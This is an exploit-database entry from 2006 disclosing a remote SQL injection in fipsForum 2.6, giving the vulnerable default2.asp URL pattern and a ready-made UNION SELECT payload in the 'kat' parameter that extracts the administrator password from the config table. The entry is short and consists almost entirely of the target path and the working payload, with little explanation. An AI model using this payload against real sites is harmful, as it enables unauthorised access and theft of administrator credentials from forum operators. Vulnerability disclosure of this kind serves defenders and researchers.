id: 1194
date: 11/22/2006
title: fipsForum <= 2.6 (default2.asp) Remote SQL Injection Vulnerability
author: ajann
cves: 

==================================================================
fipsForum <= 2.6 (default2.asp) Remote SQL Injection Vulnerability
==================================================================



*******************************************************************************
# Title   :  fipsForum <= v2.6 (default2.asp) Remote SQL Injection Vulnerability
# Author  :   ajann
# Contact :   :(

*******************************************************************************


###http://[target]/[path]//default2.asp?kat=[SQL]

Example:

//default2.asp?kat=-1%20union%20select%200,pw_admin%20from%20config


"""""""""""""""""""""
# ajann,Turkey
# ...

# Im not Hacker!



#  0day.today [2023-03-22]  #